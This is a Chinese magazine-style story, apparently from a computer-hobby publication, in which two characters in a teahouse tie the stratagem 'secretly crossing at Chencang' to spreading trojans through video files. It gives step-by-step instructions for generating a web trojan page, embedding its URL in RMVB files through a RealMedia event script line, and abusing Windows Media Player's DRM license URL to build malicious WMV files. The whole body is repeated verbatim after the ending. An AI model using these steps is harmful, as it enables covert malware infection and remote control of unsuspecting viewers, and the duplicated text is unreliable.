论文部分内容阅读
这天刘鼎正在福利彩票店里买彩票,当他边填写边祈祷中个大奖时。旁边一个人突然伸手拿走了他的笔。刘鼎抬头一看。原来是茶博士。刘鼎好奇地问道:“哟!兄弟,这么巧啊?上次在股票交易厅碰到,这次在彩票店又碰到了。”茶博士听了,急忙竖起食指,“嘘”了一下,说:“小声点。我是偷偷跑出来买彩票的。老板还在那边茶馆里坐着呢。这不买完还得赶紧回去!”刘鼎一听,笑道:“成,待会儿我也过去坐坐。”
指点迷津
两人买完彩票,一同回到茶馆。一进大门,眼尖的茶博士就朝一个角落里喊到:“公孙先生你也在啊!”刘鼎定睛一看,果然是公孙牧。随后,茶博士匆匆告辞,忙工作去了。这时刘鼎走到公孙牧的桌子旁,放下肩上背着的笔记本电脑,坐下后对公孙牧说道:“自从听了先生的教诲后,我实在是受益匪浅啊!最近我天天看《三十六计》,不过翻来覆去还是有很多地方看不懂。”公孙牧听了,哈哈大笑:“年轻人,罗马可不是一天建成的。不过只要你有心学习,会慢慢明白其中的道理的。”
“那么公孙先生今天能不能给我讲讲新的内容?”刘鼎问道。公孙牧想了想,说道:“今天就来说说三十六计中的暗渡陈仓之计吧!”刘鼎一听,兴奋地说道:“暗渡陈仓我知道,当年韩信表面上派兵修复栈道,装作要从栈道出击的姿态。实际上却和刘邦率领主力部队,暗中抄小路成功袭击陈仓。这就是‘明修栈道,暗渡陈仓’的由来。”
公孙牧听后频频点头:“的确是这样。此计原文为‘示之以动,利其静而有主,益动而巽。’这意思是说,故意让敌人看到自己的动向,麻痹敌人使其判断失误,而我方则乘虚而入,出奇制胜。古人对此计还总结出了‘奇出于正,无正不能出奇’的兵法要点。《孙子兵法》第五篇的‘凡战者,以正合,以奇胜。’说的就是这个道理。”
深入分析
此时,茶博士上茶来了。刘鼎一看,是自己喜欢的绿茶,心想在这茶馆都快泡成VIP客户了。然后,他接着问道:“那么暗渡陈仓这一计在网络安全中是如何应用的呢?”公孙牧答道:“现如今木马病毒的传播方法层出不穷,其中利用视频文件进行传播就是暗渡陈仓的主要体现。利用RMVB或WMV等视频文件做伪装,向其中插入网页木马的相关链接,当用户在观看视频时木马就悄悄地植入用户的系统了。”
刘鼎听了公孙牧的话后,再问:“那么这种入侵就必须要使用网页木马啦?”公孙牧点头肯定了刘鼎的话。刘鼎马上说道:“既然是这样,那么我就自己先来配置一个网页木马文件吧,这个我会!首先配置一个木马的服务端程序,以后就通过它来进行远程控制。将其上传到网络空间中,这样就可以得到一个木马服务端程序的网址。运行《霸王网页木马生成器》这款软件,在‘网马类型’中选择所有的漏洞选项,这样用户中马的几率就会大大增加。接着在其‘插件网址’中输入木马服务端程序的网址,再点选‘加密网马’项后点击‘生成页面’按钮即可。此时生成的这个网页木马文件mm.Html就是用于下载刚刚上传的木马服务端程序的(注:在此用大写的H以表示这不是正常的*.html文件)。”
实战操作
操作结束后,刘鼎问道:“网页木马文件已经生成完毕了,接着该怎么操作啊?我不会了。”公孙牧喝了一口茶,说:“首先,将这个网页木马文件mm.Html上传到网络空间中,得到其链接地址。现在准备一段RMVB格式的视频文件,以及相应的视频编辑工具RealMedia Editor。打开记事本并输入代码:u 00:01:00.0 00:01:30.0http://www.pcd.cn/mm.Html。这段代码的意思是在‘00:01:00.0 00:01:30.0’这个播放时间范围内,运行已经放在网上的网页木马文件mm.Html。输完代码后,将它保存为一个TXT文本文件即可。接着,启动RealMediaEditor,点选菜单‘文件一打开Real媒体文件’,导入那段RMvB视频文件,并点选菜单‘工具→合并事件’,导人刚才保存的那个TXT文本文件。最后,点选菜单‘文件→RealMedia文件另存为’,保存为一个全新的RMVB视频文件就可以了。现在只要其他人运行这个RMVB视频文件,就会弹出一个浏览器窗口去自动连接网页木马。”
刘鼎听完,不住地点头。经过一番思考后,他问道:“看来恶意RMVB视频文件的制作并不复杂,那么何必还要制作恶意WMV视频文件呢?”公孙牧答道:“这两种文件的利用方式不一样,再说每个用户的爱好也是不一样的,所以RMVB文件和WMV文件可以针对不同的用户。”刘鼎听了,点头称是:“既然是这样,那么恶意WMV视频文件又该如何制作呢?”
公孙牧说道:“现在就来看看恶意WMV视频文件如何制作。恶意RMVB文件是在标准的RMVB文件中插入一段含有网页木马的网址,而恶意WMV视频文件则不同。它是利用微软的Windows Media Player(简称WMP)播放器,在数字权限管理中可加载任意网页的漏洞制作而成的。同样,先准备一个WMV视频文件,运行《DRM音频视频加密器》这款软件,通过其‘自定义打包’标签中的‘源文件’项将之导入。然后,点击它界面中的‘认证字符串’标签,在‘认证URL’选项中输入网页木马文件的网址。接着,返回‘自定义打包’标签,在‘输出目录’中设置文件输出的目录,在‘输出文件后缀’中设置文件的后缀名为‘.wmv’。最后点击‘打包加密’按钮,即可生成恶意WMV视频文件。”
听了公孙牧的讲解后,刘鼎感叹道:“这年头看电影都不安全了,什么时候才能天下无贼啊?”公孙牧笑道:“还不止这些,除了这两种视频文件以外,网络中常见的Flash文件也不安全。现在有一款名为IcodeToSWF的工具,可以轻松地把一个网页木马地址插入到Flash文件中,同样害人!”
尾声
两个正聊到兴头上时,公孙牧的手机响了,接听后他告诉刘鼎自己有事要马上离开。而刘鼎看看天空,好像要下雨了,于是也起身准备回家去。这时,茶博士急急地跑过来,问道:“今天你们谁买单啊?”刘鼎说:“当然是你啦,这还用说啊!”茶博士不情愿地问道:“为什么啊?”公孙牧说:“两票对一票,压倒性胜利,通过!没有办法,哈哈!”欲知后事如何,请看下回分解。
指点迷津
两人买完彩票,一同回到茶馆。一进大门,眼尖的茶博士就朝一个角落里喊到:“公孙先生你也在啊!”刘鼎定睛一看,果然是公孙牧。随后,茶博士匆匆告辞,忙工作去了。这时刘鼎走到公孙牧的桌子旁,放下肩上背着的笔记本电脑,坐下后对公孙牧说道:“自从听了先生的教诲后,我实在是受益匪浅啊!最近我天天看《三十六计》,不过翻来覆去还是有很多地方看不懂。”公孙牧听了,哈哈大笑:“年轻人,罗马可不是一天建成的。不过只要你有心学习,会慢慢明白其中的道理的。”
“那么公孙先生今天能不能给我讲讲新的内容?”刘鼎问道。公孙牧想了想,说道:“今天就来说说三十六计中的暗渡陈仓之计吧!”刘鼎一听,兴奋地说道:“暗渡陈仓我知道,当年韩信表面上派兵修复栈道,装作要从栈道出击的姿态。实际上却和刘邦率领主力部队,暗中抄小路成功袭击陈仓。这就是‘明修栈道,暗渡陈仓’的由来。”
公孙牧听后频频点头:“的确是这样。此计原文为‘示之以动,利其静而有主,益动而巽。’这意思是说,故意让敌人看到自己的动向,麻痹敌人使其判断失误,而我方则乘虚而入,出奇制胜。古人对此计还总结出了‘奇出于正,无正不能出奇’的兵法要点。《孙子兵法》第五篇的‘凡战者,以正合,以奇胜。’说的就是这个道理。”
深入分析
此时,茶博士上茶来了。刘鼎一看,是自己喜欢的绿茶,心想在这茶馆都快泡成VIP客户了。然后,他接着问道:“那么暗渡陈仓这一计在网络安全中是如何应用的呢?”公孙牧答道:“现如今木马病毒的传播方法层出不穷,其中利用视频文件进行传播就是暗渡陈仓的主要体现。利用RMVB或WMV等视频文件做伪装,向其中插入网页木马的相关链接,当用户在观看视频时木马就悄悄地植入用户的系统了。”
刘鼎听了公孙牧的话后,再问:“那么这种入侵就必须要使用网页木马啦?”公孙牧点头肯定了刘鼎的话。刘鼎马上说道:“既然是这样,那么我就自己先来配置一个网页木马文件吧,这个我会!首先配置一个木马的服务端程序,以后就通过它来进行远程控制。将其上传到网络空间中,这样就可以得到一个木马服务端程序的网址。运行《霸王网页木马生成器》这款软件,在‘网马类型’中选择所有的漏洞选项,这样用户中马的几率就会大大增加。接着在其‘插件网址’中输入木马服务端程序的网址,再点选‘加密网马’项后点击‘生成页面’按钮即可。此时生成的这个网页木马文件mm.Html就是用于下载刚刚上传的木马服务端程序的(注:在此用大写的H以表示这不是正常的*.html文件)。”
实战操作
操作结束后,刘鼎问道:“网页木马文件已经生成完毕了,接着该怎么操作啊?我不会了。”公孙牧喝了一口茶,说:“首先,将这个网页木马文件mm.Html上传到网络空间中,得到其链接地址。现在准备一段RMVB格式的视频文件,以及相应的视频编辑工具RealMedia Editor。打开记事本并输入代码:u 00:01:00.0 00:01:30.0http://www.pcd.cn/mm.Html。这段代码的意思是在‘00:01:00.0 00:01:30.0’这个播放时间范围内,运行已经放在网上的网页木马文件mm.Html。输完代码后,将它保存为一个TXT文本文件即可。接着,启动RealMediaEditor,点选菜单‘文件一打开Real媒体文件’,导入那段RMvB视频文件,并点选菜单‘工具→合并事件’,导人刚才保存的那个TXT文本文件。最后,点选菜单‘文件→RealMedia文件另存为’,保存为一个全新的RMVB视频文件就可以了。现在只要其他人运行这个RMVB视频文件,就会弹出一个浏览器窗口去自动连接网页木马。”
刘鼎听完,不住地点头。经过一番思考后,他问道:“看来恶意RMVB视频文件的制作并不复杂,那么何必还要制作恶意WMV视频文件呢?”公孙牧答道:“这两种文件的利用方式不一样,再说每个用户的爱好也是不一样的,所以RMVB文件和WMV文件可以针对不同的用户。”刘鼎听了,点头称是:“既然是这样,那么恶意WMV视频文件又该如何制作呢?”
公孙牧说道:“现在就来看看恶意WMV视频文件如何制作。恶意RMVB文件是在标准的RMVB文件中插入一段含有网页木马的网址,而恶意WMV视频文件则不同。它是利用微软的Windows Media Player(简称WMP)播放器,在数字权限管理中可加载任意网页的漏洞制作而成的。同样,先准备一个WMV视频文件,运行《DRM音频视频加密器》这款软件,通过其‘自定义打包’标签中的‘源文件’项将之导入。然后,点击它界面中的‘认证字符串’标签,在‘认证URL’选项中输入网页木马文件的网址。接着,返回‘自定义打包’标签,在‘输出目录’中设置文件输出的目录,在‘输出文件后缀’中设置文件的后缀名为‘.wmv’。最后点击‘打包加密’按钮,即可生成恶意WMV视频文件。”
听了公孙牧的讲解后,刘鼎感叹道:“这年头看电影都不安全了,什么时候才能天下无贼啊?”公孙牧笑道:“还不止这些,除了这两种视频文件以外,网络中常见的Flash文件也不安全。现在有一款名为IcodeToSWF的工具,可以轻松地把一个网页木马地址插入到Flash文件中,同样害人!”
尾声
两个正聊到兴头上时,公孙牧的手机响了,接听后他告诉刘鼎自己有事要马上离开。而刘鼎看看天空,好像要下雨了,于是也起身准备回家去。这时,茶博士急急地跑过来,问道:“今天你们谁买单啊?”刘鼎说:“当然是你啦,这还用说啊!”茶博士不情愿地问道:“为什么啊?”公孙牧说:“两票对一票,压倒性胜利,通过!没有办法,哈哈!”欲知后事如何,请看下回分解。